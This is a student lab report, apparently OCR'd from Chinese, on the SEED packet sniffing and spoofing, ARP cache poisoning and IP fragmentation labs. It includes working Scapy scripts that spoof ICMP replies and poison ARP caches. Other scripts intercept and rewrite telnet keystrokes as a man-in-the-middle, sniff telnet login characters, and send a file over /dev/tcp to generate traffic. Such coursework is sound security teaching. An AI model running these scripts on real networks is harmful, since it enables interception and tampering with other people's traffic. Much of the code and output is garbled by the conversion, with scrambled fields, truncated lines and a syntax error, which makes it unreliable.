Packet Sniffing and Spoofing Lab

Task 1

```
[09/07/20]seed@VM:~/lab/lab3_task1$ vim mycode.py
[09/07/20]seed@VM:~/lab/lab3 task1$ python3 mycode.py
###[ IP ]###
 version
 ihl
           = None
 tos
            = 0x0
           = None
 len
 id
            = 1
 flags
            = 0
 frag
           = 64
 ttl
 proto
           = hopopt
 chksum
            = None
 src
            = 127.0.0.1
           = 127.0.0.1
 dst
 \options
```

网卡的相关信息如上图所示

Task 1.1A

```
[09/07/20]seed@VM:~$ ping -c 5 8.8.8.8

PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.

64 bytes from 8.8.8.8: icmp_seq=1 ttl=109 time=109 ms

64 bytes from 8.8.8.8: icmp_seq=2 ttl=109 time=106 ms

64 bytes from 8.8.8.8: icmp_seq=3 ttl=109 time=116 ms

64 bytes from 8.8.8.8: icmp_seq=4 ttl=109 time=123 ms

64 bytes from 8.8.8.8: icmp_seq=5 ttl=109 time=104 ms

--- 8.8.8.8 ping statistics ---

5 packets transmitted, 5 received, 0% packet loss, time 4006ms

rtt min/avg/max/mdev = 104.576/112.020/123.166/6.852 ms
```

Ping 8.8.8.8

```
[09/07/20]seed@VM:~/lab/lab3_task1$ vim sniffer.py
[09/07/20]seed@VM:~/lab/lab3_task1$ chmod a+x sniffer.py
[09/07/20]seed@VM:~/lab/lab3_task1$ sudo ./sniffer.py
###[ Ethernet ]###
             = 52:54:00:12:35:02
 dst
 src
            = 08:00:27:65:91:a6
  type
               IPv4
###[ IP ]###
     version
     ihl
                = 5
     tos
                = 0x0
     len
                = 84
                = 9797
     id
     flags
                = DF
     frag
                = 0
     ttl
                = 64
     proto
                = icmp
     chksum
                = 0xf845
     src
                = 10.0.2.15
     dst
                = 8.8.8.8
     \options
###[ ICMP ]###
        type
                   = echo-request
        code
                   = 0
                   = 0xb330
        chksum
        id
                   = 0xc0a
        seq
                   = 0x1
###[ Raw ]###
                       = '\xc5\xddV_'\x84\n\x00\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11
           load
x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%\'()*+,-./0123456
```

Root 权限下收到的报文如图所示

```
[09/07/20]seed@VM:~/lab/lab3_taskl$ ./sniffer.py
Traceback (most recent call last):
    File "./sniffer.py", line 5, in <module>
        pkt = sniff(filter='icmp',prn=print_pkt)
    File "/usr/local/lib/python3.5/dist-packages/scapy/sendrecv.py", line 1036, in sniff
        sniffer._run(*args, **kwargs)
    File "/usr/local/lib/python3.5/dist-packages/scapy/sendrecv.py", line 907, in run
        *arg, **karg)] = iface
    File "/usr/local/lib/python3.5/dist-packages/scapy/arch/linux.py", line 398, in __init__
        self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(typ e)) # noqa: E501
    File "/usr/lib/python3.5/socket.py", line 134, in __init__
        socket.socket.__init__(self, family, type, proto, fileno)
PermissionError: [Errno 1] Operation_not permitted
```

用普通用户权限会报错,因为没有权限调用 socket 函数。

Task 1.1B

仅捕获 ICMP 数据包上一个 Task 已经实现

```
>>> from scapy.all import *
>>> data = 'Hello Scapy'
>>> pkt = IP(src='10.0.2.15', dst='2.3.3.3')/TCP(sport=12345, dport=23)/data
>>> send(pkt, inter=1, count=1)
```

伪造以虚拟机为起点,2.3.3.3:23 为终点的报文,如上图所示

```
!/usr/bin/python3
from scapy.all import *
def print_pkt(pkt):
    pkt.show()
#pkt = sniff(filter='icmp',prn=print_pkt)
pkt = sniff(filter='tcp and src host 10.0.2.15 and dst port 23',prn=print_pkt)
~
```

捕获报文如上图所示

```
[09/07/20]seed@VM:~/lab/lab3 task1$ sudo ./sniffer.py
###[ Ethernet ]###
 dst
            = 52:54:00:12:35:02
  src
            = 08:00:27:65:91:a6
  type
            = IPv4
###[ IP ]###
               = 4
     version
     ihl
               = 5
     tos
               = 0x0
               = 51
     len
     id
               = 1
     flags
               = 0
     frag
     ttl
               = 64
     proto
               = tcp
     chksum
               = 0x69b0
               = 10.0.2.15
     src
     dst
               = 2.3.3.3
     \options
###[ TCP ]###
                  = 12345
        sport
        dport
                  = telnet
                  = 0
        seq
        ack
                  = 0
        dataofs
                  = 5
        reserved = 0
                  = S
        flags
                  = 8192
        window
                  = 0xfcac
        chksum
                  = 0
        urgptr
        options
                  = []
###[ Raw ]###
           load
                      = 'Hello Scapy'
```

嗅探到的结果如上图所示

```
>>> pkt = IP(src='10.0.2.15', dst='128.230.0.1')/TCP(sport=12345, dport=23)/data >>> send(pkt, inter=1, count=1)
```

伪造以虚拟机为起点, 128.230.0.1 为终点的报文, 如上图所示

```
!/usr/bin/python3
from scapy.all import *
def print_pkt(pkt):
    pkt.show()
#pkt = sniff(filter='icmp',prn=print_pkt)
#pkt = sniff(filter='tcp and src host 10.0.2.15 and dst port 23',prn=print_pkt)
pkt = sniff(filter='tcp and dst net 128.230.0.0/16',prn=print_pkt)
```

捕获报文如上图所示

```
[09/07/20]seed@VM:~/lab/lab3 task1$ sudo ./sniffer.py
###[ Ethernet ]###
 dst
            = 52:54:00:12:35:02
  src
            = 08:00:27:65:91:a6
            = IPv4
  type
###[ IP ]###
               = 4
     version
     ihl
               = 5
     tos
               = 0x0
     len
               = 51
     id
    flags
     frag
               = 0
     ttl
               = 64
               = tcp
     proto
     chksum
               = 0xedce
               = 10.0.2.15
     src
               = 128.230.0.1
     dst
     \options
###[ TCP ]###
        sport
                  = 12345
                  = telnet
        dport
        seq
                  = 0
                  = 0
        ack
                  = 5
        dataofs
        reserved = 0
                  = S
        flags
        window
                  = 8192
        chksum
                  = 0x80cb
                  = 0
        urgptr
        options
                  = []
###[ Raw ]###
           load
                     = 'Hello Scapy'
```

捕获到的报文如上图所示

Task 1.2

```
>>> a = IP()
>>> a.src = '10.0.2.3'
>>> a.dst = '10.0.2.15'
>>> b= ICMP()
>>> p=a/b
>>> send(p)
.
Sent 1 packets.
```

伪造了一个 src 为 10.0.2.3 的报文

1 2020-09-08	00:22:53.0869188			64 < Ignc
2 2020-09-08	00:23:07.8002684	10.0.2.3	10.0.2.15	44 Echo
3 2020-09-08	00:23:13.1070318			64 < Igno

Wireshark 检测成功

Task 1.3

```
rom scapy.all import *
a = IP()
a.dst = '8.8.8.8'
for i in range(1,14):
    a.ttl = i
    b = ICMP()
    send(a/b)
```

根据 traceroute 试探得到本虚拟机到 8.8.8.8 共有 13 跳,构造的发送程序如上图 所示

```
4 2020-09-08 00:36:55.5355354... 10.0.2.2
                                                          10.0.2.15
                                                                                 ICMP
                                                                                              70 Time-to
 6 2020-09-08 00:36:55.5405442... 192.168.31.1
                                                          10.0.2.15
                                                                                 ICMP
                                                                                             70 Time-to
 8 2020-09-08 00:36:55.5480304... 114.222.140.1
                                                          10.0.2.15
                                                                                 ICMP
                                                                                             70 Time-to
10\ 2020\hbox{-}09\hbox{-}08\ 00\hbox{:}36\hbox{:}55.5628767...\ 221.231.175.221
                                                          10.0.2.15
                                                                                 TCMP
                                                                                             70 Time-to
12 2020-09-08 00:36:55.5743092... 218.2.182.29
                                                                                 TCMP
                                                          10.0.2.15
                                                                                             70 Time-to
15 2020-09-08 00:36:55.5872788... 202.97.92.13
                                                                                 ICMP
                                                          10.0.2.15
                                                                                             70 Time-to
21 2020-09-08 00:36:55.6389307... 202.97.12.194
                                                          10.0.2.15
                                                                                 ICMP
                                                                                             70 Time-to
23 2020-09-08 00:36:55.6490769... 202.97.6.6
                                                                                 ICMP
                                                                                             70 Time-to
                                                          10.0.2.15
24 2020-09-08 00:36:55.6516208... 202.97.122.70
                                                                                 ICMP
                                                                                             70 Time-to
                                                          10.0.2.15
25 2020-09-08 00:36:55.6705741... 108.170.241.33
                                                                                 ICMP
                                                                                             70 Time-to
                                                          10.0.2.15
26 2020-09-08 00:36:55.6767552... 172.253.69.225
                                                          10.0.2.15
                                                                                 ICMP
                                                                                             70 Time-to
27 2020-09-08 00:36:55.6832850... 8.8.8.8
                                                          10.0.2.15
                                                                                 ICMP
                                                                                             60 Echo (p
```

Wireshark 探测结果如图所示

Task 1.4

首先构建两台虚拟机,并使他们运行在同一个局域网环境下:

Seedubuntu 的环境如上图所示

```
bwhe@bwhe-VirtualBox:~$ ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
       inet 10.0.2.4 netmask 255.255.255.0 broadcast 10.0.2.255
        inet6 fe80::cc95:9c7e:1f3a:ec17 prefixlen 64 scopeid 0x20<link>
       ether 08:00:27:a2:51:7c txqueuelen 1000 (Ethernet)
       RX packets 214 bytes 130391 (130.3 KB)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 190 bytes 18402 (18.4 KB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
       inet6 ::1 prefixlen 128 scopeid 0x10<host>
       loop txqueuelen 1000 (Local Loopback)
       RX packets 72 bytes 6194 (6.1 KB)
       RX errors 0 dropped 0 overruns 0
       TX packets 72 bytes 6194 (6.1 KB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
bwhe@bwhe-VirtualBox:~$ ping -c 5 3.3.3.3
PING 3.3.3.3 (3.3.3.3) 56(84) bytes of data.
--- 3.3.3.3 ping statistics ---
5 packets transmitted, 0 received, 100% packet loss, time 4099ms
```

Experiment 的环境如上图所示,并向 3.3.3.3 发送 5 个 echo-request 报文,没有 echo-reply

```
[09/08/20]seed@VM:~/lab/lab3 task1$ sudo ./sniffer.py
###[ Ethernet ]###
          = 52:54:00:12:35:00
 dst
           = 08:00:27:a2:51:7c
 src
 type
           = IPv4
###[ IP ]###
    version
              = 4
    ihl
              = 5
    tos
              = 0 \times 0
    len
              = 84
    id
              = 25177
    flags
              = DF
    frag
              = 0
              = 64
    ttl
    proto
              = icmp
    chksum
              = 0xc646
    src
              = 10.0.2.4
    dst
              = 3.3.3.3
    \options
###[ ICMP ]###
                 = echo-request
       type
                = 0
       code
       chksum
                = 0x56f4
       id
                 = 0x6c5
                 = 0x1
       sea
###[ Raw ]###
                    = '\xb9*W \x00\x00\x00\x00\x06\xe8\x04\x00\x00\x00\x00\x00\
x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&\'()*+,-./
01234567'
```

```
#!/ur/bin/python3
from scapy.all import *
def print_pkt(pkt):
    dst=pkt.sprintf("%IP.dst%")
src=pkt.sprintf("%IP.src%")
    Type=pkt.sprintf("%ICMP.type%")
    Code=pkt.sprintf("%ICMP.code%")
    Id=pkt.sprintf("%ICMP.id%")
Seq=pkt.sprintf("%ICMP.seq%")
    if(Type!="echo-request"):
    a = IP()
    a.dst=src
    a.src=dst
    b = ICMP()
    b.type="echo-reply"
    b.id=int(Id, 16)
    b.seq=int(Seq, 16)
    send(a/b)
pkt = sniff(filter='icmp',prn=print pkt)
```

接着伪造 icmp-reply 数据包,如上图所示

```
bwhe@bwhe-VirtualBox:~$ ping -c 1 3.3.3.3
PING 3.3.3.3 (3.3.3.3) 56(84) bytes of data.
8 bytes from 3.3.3.3: icmp_seq=1 ttl=64 (truncated)
--- 3.3.3.3 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 9223372036854775.807/0.000/0.000/0.000 ms
```

最终成功接收,如上图所示

Task 2.1A

```
void got_packet(u_char *args, const struct pcap_pkthdr *header,
                                   const u char *packet)
 struct ethheader *eth = (struct ethheader *)packet;
 if (ntohs(eth->ether_type) == 0x0800) { // 0x0800 is IP type}
   struct ipheader * ip = (struct ipheader *)
    (packet + sizeof(struct ethheader));
                     From: %s\n", inet_ntoa(ip->iph_sourceip));
To: %s\n", inet_ntoa(ip->iph_destip));
    printf("
    printf("
    /* determine protocol *
    switch(ip->iph_protocol) {
   case IPPROTO_TCP:
        printf(" Protocol
                         Protocol: TCP\n");
         case IPPROTO UDP:
                         Protocol: UDP\n");
            printf("
         case IPPROTO ICMP:
           printf("
                        Protocol: ICMP\n");
              return;
        default:
            printf(" Protocol: others\n");
             return;
 }
```

填充代码如上图所示

```
From: 203.208.50.161
To: 10.0.2.5
Protocol: TCP
From: 10.0.2.5
To: 203.208.50.161
Protocol: TCP
From: 203.208.50.161
To: 10.0.2.5
Protocol: TCP
From: 203.208.50.161
To: 10.0.2.5
Protocol: TCP
From: 203.208.50.161
To: 10.0.2.5
To: 203.208.50.161
To: 10.0.2.5
Protocol: TCP
From: 203.208.50.161
Protocol: TCP
From: 10.0.2.5
To: 203.208.50.161
Protocol: TCP
From: 10.0.2.5
To: 203.208.50.161
Protocol: TCP
From: 10.0.2.5
To: 203.208.50.161
Protocol: TCP
From: 203.208.50.161
Protocol: TCP
From: 10.0.2.5
To: 203.208.50.161
Protocol: TCP
From: 203.208.50.161
```

截图如上图所示

Question 1

调用 pcap_open_live 初始化 raw socket 调用 pcap_compile 和 pcap_setfilter 设置过滤器 调用 pcap_close 捕获数据包并利用 got_packet 函数进行处理 调用 pcap_close 关闭相关句柄

Question 2

没有权限调用 pcap_compile 时会报错

Question 3

打开混杂状态时,可以接收到发送给其他机器的指定报文,关闭混杂模式时,只 能收到发送给自己的报文。

Task 2.1B

```
!/usr/bin/python3
from scapy.all import *
def print pkt(pkt):
   dst=pkt.sprintf("%IP.dst%")
   src=pkt.sprintf("%IP.src%")
   print("source ip addr: ",src)
print("destination ip addr: ",dst)
pkt = sniff(filter='icmp and src 10.0.2.6 and dst 10.0.2.4',prn=print_pkt)
如上图所示,源地址为 10.0.2.6,目的地址为 10.0.2.4
[09/12/20]seed@VM:~/lab/lab3 task1$ sudo ./sniffer2.py
source ip addr: 10.0.2.6
destination ip addr: 10.0.2.4
让两个地址之间进行 ping,捕获结果如上图所示
bwhe@bwhe-VirtualBox:~$ cat ~/secret > /dev/tcp/10.0.2.6/10
bash: connect: Connection refused
bash: /dev/tcp/10.0.2.6/10: Connection refused
bwhe@bwhe-VirtualBox:~$ cat ~/secret > /dev/tcp/10.0.2.6/100
bash: connect: Connection refused
bash: /dev/tcp/10.0.2.6/100: Connection refused
bwhe@bwhe-VirtualBox:~$ cat ~/secret > /dev/tcp/10.0.2.6/101
bash: connect: Connection refused
bash: /dev/tcp/10.0.2.6/101: Connection refused
利用该指令创建 tcp 连接
[09/12/20]seed@VM:~/lab/lab3 task1$ sudo ./sniffer2.py
source ip addr: 10.0.2.4
destination ip addr: 10.0.2.6
destination port: 10
source ip addr: 10.0.2.4
destination ip addr: 10.0.2.6
destination port: 100
过滤结果如上图所示
!/usr/bin/python3
from scapy.all import *
def print pkt(pkt):
   dst=pkt.sprintf("%IP.dst%")
   src=pkt.sprintf("%IP.src%")
   port=pkt[TCP].dport
   print("source ip addr: ",src)
   print("destination ip addr: ",dst)
   print("destination port: ",port)
pkt = sniff(filter='tcp and dst portrange 10-100',prn=print_pkt)
#pkt = sniff(filter='tcp and src host 10.0.2.15 and dst port 23',prn=print pkt)
```

Task 2.1C

过滤代码如上图所示

```
source ip addr: 10.0.2.6
destination ip addr: 10.0.2.4
data b'b'
source ip addr: 10.0.2.6
destination ip addr: 10.0.2.4
data b'w'
source ip addr: 10.0.2.6
destination ip addr: 10.0.2.4
data b'h'
source ip addr: 10.0.2.6
destination ip addr: 10.0.2.4
data b'h'
source ip addr: 10.0.2.6
destination ip addr: 10.0.2.4
```

可以明显地看到截取到了用户名 bwhe,密码涉及个人隐私就不截图了

```
!/usr/bin/python3
from scapy.all import *
def print_pkt(pkt):
    dst=pkt.sprintf("%IP.dst%")
    src=pkt.sprintf("%IP.src%")
    if(pkt[TCP].payload):
        data=pkt[TCP].payload.load
        print("source ip addr: ",src)
        print("destination ip addr: ",dst)
        print("data ",str(data))
pkt = sniff(filter='tcp and dst port 23',prn=print_pkt)
#pkt = sniff(filter='tcp and src host 10.0.2.15 and dst port 23',prn=print_pkt)
#pkt = sniff(filter='tcp and dst net 128.230.0.0/16',prn=print_pkt)
```

截获代码如上图所示

Task 2.2A

Spoof 代码如上图所示,伪造了 icmp 报文并发送

```
rame 3: 60 bytes on wire (480 bits), 60 bytes captured (480 bits) on interface 0 thernet II, Src: PcsCompu_2e:d0:60 (08:00:27:2e:d0:60), Dst: PcsCompu_2a:05:36 (08:00:27:2a:05:36)
nternet Protocol Version 4, Src: 10.0.2.5, Dst: 10.0.2.6
 0100 .... = Version: 4
 .... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
 Total Length: 28
 Identification: 0xf96f (63855)
 Flags: 0x00
 Fragment offset: 0
 Time to live: 20
 Protocol: ICMP (1)
 Header checksum: 0x9567 [validation disabled]
 [Header checksum status: Unverified]
 Source: 10.0.2.5
 Destination: 10.0.2.6
 [Source GeoIP: Unknown]
 [Destination GeoIP: Unknown]
```

Wireshark 截图如上图所示

Task 2.2B

```
→ 3 2020-09-12 07:43:47.4564225... 10.0.2.5 10.0.2.6 ICMP 60 Echo (ping) request id=0x0000, seq=0/0, ttl=20 (re...

4 2020-09-12 07:43:47.4564444... 10.0.2.6 10.0.2.5 ICMP 42 Echo (ping) reply id=0x0000, seq=0/0, ttl=64 (re...
```

Icmp echo request 伪造报文如 Task2.2A 所示, echo reply 报文可见 wireshark 结果

Task 2.3

伪造报文如上图所示

```
bwhe@bwhe-VirtualBox:~$ ping 3.3.3.3 -c 5
PING 3.3.3.3 (3.3.3.3) 56(84) bytes of data.
8 bytes from 3.3.3.3: icmp_seq=1 ttl=20 (truncated)
8 bytes from 3.3.3.3: icmp_seq=2 ttl=20 (truncated)
8 bytes from 3.3.3.3: icmp_seq=3 ttl=20 (truncated)
8 bytes from 3.3.3.3: icmp_seq=4 ttl=20 (truncated)
8 bytes from 3.3.3.3: icmp_seq=4 ttl=20 (truncated)
--- 3.3.3.3 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4000ms
rtt min/avg/max/mdev = 9223372036854775.807/0.000/0.000/0.000
```

Ping 接收结果如上图所示

ARP Cache Poisoning Attack Lab

Task1

Task1A

```
虚拟环境中 IP 地址与 MAC 地址对应关系如下表所示:
```

```
M 10.0.2.5 08:00:27:2e:d0:60
A 10.0.2.6 08:00:27:2a:05:36
B 10.0.2.4 08:00:27:a2:51:7c
```

M 向 A 发送的报文如上图所示

```
[09/08/20]seed@VM:~$ arp -a
? (10.0.2.3) at 08:00:27:a1:22:21 [ether] on enp0s3
? (10.0.2.4) at 08:00:27:2e:d0:60 [ether] on enp0s3
? (10.0.2.1) at 52:54:00:12:35:00 [ether] on enp0s3
```

A的 arp 表内容如上图所示

Task1B

```
■!/usr/bin/python3
from scapy.all import *
eth = Ether(src="08:00:27:2e:d0:60", dst="08:00:27:2a:05:36")#赋值src_mac时需要>
注意,参数为字符串类型
arp = ARP(hwsrc="08:00:27:2e:d0:60", psrc="10.0.2.4", hwdst="08:00:27:2a:05:36", pdst="10.0.2.6", op=2)#src为源,dst为目标,op=2为响应报文、1为请求
pkt = eth/arp
sendp(pkt)
```

M 向 A 发送的报文如上图所示

```
[09/08/20]seed@VM:~$ sudo arp -d 10.0.2.4

[09/08/20]seed@VM:~$ arp -a

? (10.0.2.3) at 08:00:27:a1:22:21 [ether] on enp0s3

? (10.0.2.4) at <incomplete> on enp0s3

? (10.0.2.1) at 52:54:00:12:35:00 [ether] on enp0s3

[09/08/20]seed@VM:~$ arp -a

? (10.0.2.3) at 08:00:27:a1:22:21 [ether] on enp0s3

? (10.0.2.4) at 08:00:27:2e:d0:60 [ether] on enp0s3

? (10.0.2.1) at 52:54:00:12:35:00 [ether] on enp0s3
```

首先将 arp 表相关内容清空,然后进行再次污染,如上图所示

Task1C

M 发送的报文如上图所示

```
[09/08/20]seed@VM:~$ sudo arp -d 10.0.2.4

[09/08/20]seed@VM:~$ arp -a

? (10.0.2.3) at 08:00:27:a1:22:21 [ether] on enp0s3

? (10.0.2.4) at <incomplete> on enp0s3

? (10.0.2.1) at 52:54:00:12:35:00 [ether] on enp0s3

[09/08/20]seed@VM:~$ arp -a

? (10.0.2.3) at 08:00:27:a1:22:21 [ether] on enp0s3

? (10.0.2.4) at 08:00:27:2e:d0:60 [ether] on enp0s3

? (10.0.2.1) at 52:54:00:12:35:00 [ether] on enp0s3
```

首先将 arp 表相关内容清空,然后进行再次污染,如上图所示

Task2

Step1

```
#!/usr/bin/python3
from scapy.all import *
eth = Ether(src="08:00:27:2e:d0:60", dst="ff:ff:ff:ff:ff:ff:ff")#赋值src_mac时需要>
注意,参数为字符串类型
arp = ARP(hwsrc="08:00:27:2e:d0:60", psrc="10.0.2.4",pdst="10.0.2.6", op=1)#src>
为源,dst为目标,op=2为响应报文、1为请求
pkt = eth/arp
sendp(pkt)
arp = ARP(hwsrc="08:00:27:2e:d0:60", psrc="10.0.2.6",pdst="10.0.2.4", op=1)
pkt = eth/arp
sendp(pkt)
```

M 发送的污染报文如上图所示

[09/09/20]seed@VM:~\$ arp -a

? (10.0.2.4) at 08:00:27:2e:d0:60 [ether] on enp0s3 ? (10.0.2.1) at 52:54:00:12:35:00 [ether] on enp0s3

A 处的 arp 表,证明污染成功

bwhe@bwhe-VirtualBox:~\$ arp -a ? (10.0.2.6) at 08:00:27:2e:d0:60 [ether] on enp0s3 _gateway (10.0.2.1) at 52:54:00:12:35:00 [ether] on enp0s3

B 处的 arp 表,证明污染成功

Step2

A与B互相 ping 不通

24 2020 00 00 02:20:47 2264046 40 0 2 6	10 0 2 4	TCMD	OO Tobo (ning
31 2020-09-09 03:30:17.2361816 10.0.2.6	10.0.2.4	ICMP	98 Echo (ping
55 2020-09-09 03:30:39.6596119 10.0.2.4	10.0.2.6	ICMP	98 Echo (ping

A 处 wireshark 截图如上图

↓ 45 39.965627432 10.0.2.4 10.0.2.6 ICMP 98 Echo (ping) request id=0x09cd, seq=1/256, ttl=64 (no)	L	21 17.542511591 45 39.965627432		10.0.2.4 10.0.2.6	ICMP ICMP	98 Echo (ping) requ 98 Echo (ping) requ	est id=0x0be3, est id=0x09cd,	seq=1/256, seq=1/256,	ttl=64 (ttl=64 (10 10
---	---	------------------------------------	--	----------------------	--------------	--	----------------------------------	--------------------------	----------------------	----------

B 处 wireshark 截图如上图

可以看见均只有 icmp echo request 报文,没有 echo reply 报文

Step3

A与B之间已经可以 ping 通, 之间经过了 M 的转发

	1 0				
	11 2020-09-09 03:39:53.6755010 10.0.2.6	10.0.2.4	ICMP	98 Echo (ping) request	id=
	▶ 14 2020-09-09 03:39:53.6762202 10.0.2.6	10.0.2.4	ICMP	98 Echo (ping) request	id=
4	15 2020-09-09 03:39:53.6762235 10.0.2.4	10.0.2.6	ICMP	98 Echo (ping) reply	id=
	16 2020-09-09 03:39:53.6762246 10.0.2.5	10.0.2.4	ICMP	126 Redirect	(Re
	17 2020-09-09 03:39:53.6764575 10.0.2.5	10.0.2.6	ICMP	126 Redirect	(Re
	18 2020-09-09 03:39:53.6764716 10.0.2.4	10.0.2.6	ICMP	98 Echo (ping) reply	id=
	57 2020-09-09 03:40:37.0578069 10.0.2.6	10.0.2.4	ICMP	98 Echo (ping) request	id=
	58 2020-09-09 03:40:37.0581610 10.0.2.5	10.0.2.6	ICMP	126 Redirect	(Re
	59 2020-09-09 03:40:37.0581808 10.0.2.6	10.0.2.4	ICMP	98 Echo (ping) request	id=
	60 2020-09-09 03:40:37.0581828 10.0.2.4	10.0.2.6	ICMP	98 Echo (ping) reply	id=
	61 2020-09-09 03:40:37.0584408 10.0.2.5	10.0.2.4	ICMP	126 Redirect	(Re

A 处 wireshark 截图如上图

Г	17 10.524301035	10.0.2.6	10.0.2.4	ICMP	98 Echo (ping) request	id=0x0cb1, seq=1/256, ttl=64 (n
	19 10.524455341	10.0.2.6	10.0.2.4	ICMP	98 Echo (ping) request	id=0x0cb1, seq=1/256, ttl=63 (r
	20 10.524477083	10.0.2.4	10.0.2.6	ICMP	98 Echo (ping) reply	id=0x0cb1, seq=1/256, ttl=64 (r
	21 10.524607501		10.0.2.4	ICMP	126 Redirect	(Redirect for host)
L	23 10.525070262		10.0.2.6	ICMP	126 Redirect	(Redirect for host)
	24 10.525072872	20101211	10.0.2.6	ICMP	98 Echo (ping) reply	id=0x0cb1, seq=1/256, ttl=63
	63 53.906583449		10.0.2.4	ICMP	98 Echo (ping) request	id=0x0cbe, seq=1/256, ttl=64 (n
L!		10.0.2.5	10.0.2.6	ICMP	126 Redirect	(Redirect for host)
	65 53.906750835		10.0.2.4	ICMP	98 Echo (ping) request	id=0x0cbe, seq=1/256, ttl=63 (r
	00 001000111000	10.0.2.4	10.0.2.6	ICMP	98 Echo (ping) reply	id=0x0cbe, seq=1/256, ttl=64 (r
L	67 53.906907143		10.0.2.4	ICMP	126 Redirect	(Redirect for host)
	00 00100000000	10.0.2.4	10.0.2.6	ICMP	98 Echo (ping) reply	id=0x0cbe, seq=1/256, ttl=63
	133 120.933233084	10.0.2.5	10.0.2.3	ICMP	590 Redirect	(Redirect for host)

B 处 wireshark 截图如上图

Step4

首先在机器 B 上开启 telnet 服务 (https://blog.csdn.net/xkwy100/article/details/80328646)

机器 A 连接成功

```
[09/09/20]seed@VM:~$ telnet 10.0.2.4
Trying 10.0.2.4...
Connected to 10.0.2.4.
Escape character is '^]'.
Ubuntu 18.04.4 LTS
bwhe-VirtualBox login: ^[[A
Password:
Login incorrect
bwhe-VirtualBox login: bwhe
Password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.4.0-47-generic x86 64)
 * Documentation: https://help.ubuntu.com
 * Management:
                   https://landscape.canonical.com
                   https://ubuntu.com/advantage
 * Support:
 * Kubernetes 1.19 is out! Get it in one command with:
     sudo snap install microk8s --channel=1.19 --classic
   https://microk8s.io/ has docs and details.
 * Canonical Livepatch is available for installation.
    Reduce system reboots and improve kernel security. Activate at:
    https://ubuntu.com/livepatch
106 packages can be updated.
1 update is a security update.
```

```
bwhe@bwhe-VirtualBox:~$ ls

Desktop Downloads os_experiment Public Videos

Documents Music Pictures Templates

bwhe@bwhe-VirtualBox:~$ |
```

ARP 污染后,发现无法再键入指令

模仿杜文亮老师的 tcp_spoof 文件进行 sniff_spoof

```
bwhe-VirtualBox login: bwhe
Password:
Last login: Thu Sep 10 09:23:58 CST 2020 from 10.0.2.6 on pts/2
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.4.0-47-generic x86_64)
 * Documentation: https://help.ubuntu.com
* Management:
                  https://landscape.canonical.com
* Support:
                  https://ubuntu.com/advantage
 * Kubernetes 1.19 is out! Get it in one command with:
     sudo snap install microk8s --channel=1.19 --classic
  https://microk8s.io/ has docs and details.
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
    https://ubuntu.com/livepatch
106 packages can be updated.
1 update is a security update.
Your Hardware Enablement Stack (HWE) is supported until April 2023.
bwhe@bwhe-VirtualBox:~$ ZZZZ
```

无论键入何字符均产生Z

```
import re
def spoof pkt(pkt):
   #print("Original Packet.....
   #print("Source IP : ", pkt[IP].src)
   #print("Destination IP :", pkt[IP].dst)
   newpkt=pkt[IP]
    if(pkt[IP].src == "10.0.2.6" and pkt[IP].dst == "10.0.2.4" and pkt[TCP].payl
oad):
        data=pkt[TCP].payload.load
       del(newpkt.chksum)
       del(newpkt[TCP].chksum)
        del(newpkt[TCP].payload)
        data list=list(data)
        for i in range(len(data list)):
            if(chr(data list[i]).isalpha()):
                data list[i]=ord('Z')
       data=bytes(data list)
       newpkt=newpkt/data
        send(newpkt)
   elif(pkt[IP].src == "10.0.2.4" and pkt[IP].dst == "10.0.2.6"):
        send(newpkt)
pkt = sniff(filter='tcp',prn=spoof pkt)
```

代码如上图所示

IP/ICMP Attacks Lab

Task1.a

```
!/usr/bin/python3
from scapy.all import *
# Construct IP header
ip = IP( dst="10.0.2.6")
ip.id = 1000 # Identification
ip.frag = 0 # Offset of this IP fragment
ip.flags = 1 # Flags
 Construct UDP header
udp = UDP(sport=7070, dport=9090)
udp.len = 104 # This should be the combined length of all fragments
# Construct payload
payload = 'A' * 32 # Put 32 bytes in the first fragment
 Construct the entire packet and send it out
pkt = ip/udp/payload # For other fragments, we should use ip/payload
pkt[UDP].checksum = 0 # Set the checksum field to zero
send(pkt, verbose=0)
ip = IP( dst="10.0.2.6", proto=17)
ip.id = 1000 # Identification
ip.frag = 5 # Offset of this IP fragment
ip.flags = 1 # Flags
payload = 'B' * 32 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/payload # For other fragments, we should use ip/payload
send(pkt, verbose=0)
ip = IP( dst="10.0.2.6",proto=17)
ip.id = 1000 # Identification
ip.frag = 9 # Offset of this IP fragment
ip.flags = 0 # Flags
payload = 'C' * 32 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/payload # For other fragments, we should use ip/payload
send(pkt, verbose=0)
填充代码如上图所示,每个分片的数据都是不一样的
```

Wireshark 接收到的数据如上图所示

接收到的字符如上图所示

Task1.b

将第二段的偏移值设为 2, 这种情况下 K=16

```
#!/usr/bin/python3
from scapy.all import *
ip = IP( dst="10.0.2.6")
ip.id = 1000 # Identification
ip.frag = 0 # Offset of this IP fragment
ip.flags = 1 # Flags
# Construct UDP header
udp = UDP(sport=7070, dport=9090,chksum=0)
udp.len = 80 # This should be the combined length of all fragments
# Construct payload
payload = 'A' * 32 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/udp/Raw(load=payload) # For other fragments, we should use ip/payload
pkt[UDP].chksm = # Set the checksum field to zero
send(pkt)
ip = IP( dst="10.0.2.6", proto=17)
ip.id = 1000 # Identification
ip.frag = 2 # Offset of this IP fragment
ip.flags = 1 # Flags
